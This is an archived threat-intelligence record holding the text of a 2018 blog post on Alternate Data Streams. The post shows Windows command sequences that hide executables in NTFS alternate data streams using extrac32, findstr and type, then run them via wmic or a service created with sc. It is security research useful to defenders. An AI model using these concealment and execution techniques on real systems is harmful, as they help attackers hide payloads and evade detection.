{
	"id": "41d83c05-d51d-440c-926f-c089fa191cb0",
	"created_at": "2026-04-06T00:19:40.474345Z",
	"updated_at": "2026-04-10T03:20:51.897377Z",
	"deleted_at": null,
	"sha1_hash": "700aa689e031649e97735bbf1214271f73782077",
	"title": "Putting data in Alternate data streams and how to execute it – part 2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 193405,
	"plain_text": "Putting data in Alternate data streams and how to execute it – part\r\n2\r\nPublished: 2018-04-11 · Archived: 2026-04-05 13:39:09 UTC\r\nI wrote a blogpost a while back about Alternate data streams that you can find\r\nhere: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nAfter I wrote that post I have made some new discoveries that I wanted to share around Alternate data streams. As\r\nyou probably already know if you read some of my stuff is that I am a big fan of Living off the land techniques.\r\nThe only method I knew about to inject data into a alternate data stream when I wrote the first post was the “type”\r\ncommand.\r\nI have since my last blogpost discovered some other techniques as well. These techniques I have discovered can of\r\ncourse have been discovered by others and already been blogged about, if so please let me know and I will link to\r\nyour blogpost.\r\nEXTRAC32.EXE\r\nFirst up is extrac32. If do not know this command you can read more about it\r\nhere: https://ss64.com/nt/extract.html\r\nBasically what you use it for is to extract cab files. What I figured out was that you also can use this command to\r\nadd alternate data streams. The PoC for doing this (including creating a CAB) looks like this:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\nmakecab c:\\ADS\\procexp.exe c:\\ADS\\procexp.cab\r\nextrac32 C:\\ADS\\procexp.cab c:\\ADS\\file.txt:procexp.exe\r\nwmic process call create '\"c:\\ADS\\file.txt:procexp.exe\"'\r\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nPage 1 of 4\n\nFINDSTR.EXE\r\nAlso in my research I found that Findstr can also be used to inject a payload into another file as an ADS stream.\r\nFindstr.exe is basically a command you use to find strings within files.\r\nMore about the binary here: https://ss64.com/nt/findstr.html\r\nThe cool thing I figured out was that you can search for a string that does not exist in a file and pipe that into a\r\nnew file. And the cool thing is that it does allow it to be piped into a ADS stream of a file. It looks like this:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\procexp.exe \u003e c:\\ADS\\file.txt:procexp.exe\r\nwmic process call create '\"c:\\ADS\\file.txt:procexp.exe\"'\r\nThe /V in the findstr command makes sure that everything that does not match the string I am searching for is\r\nshowed. 🙂\r\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nPage 2 of 4\n\nExecuting ADS binary\r\nI found another way to execute a binary from a alternate data stream when I was digging into this. It is possible to\r\ncreate a service in Windows (this requires local admin rights) that executes content from an Alternate Data Stream.\r\nI use the SC command to execute the necessary commands to create the service as want using these commands:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\ntype c:\\windows\\system32\\cmd.exe \u003e c:\\ADS\\file.txt:cmd.exe\r\nsc create evilservice binPath= \"\\\"c:\\ADS\\file.txt:cmd.exe\\\" /c echo works \u003e \\\"c:\\ADS\\works.txt\\\"\" Dis\r\nsc start evilservice\r\nAnd it looks like this:\r\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nPage 3 of 4\n\nThat’s all for this time. I have also updated my ADS gist here for other\r\nmethods: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\r\nHope you liked the post and as always I appreciate feedback. 🙂\r\nSource: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"
	],
	"report_names": [
		"putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434780,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.pdf",
		"text": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.txt",
		"img": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.jpg"
	}
}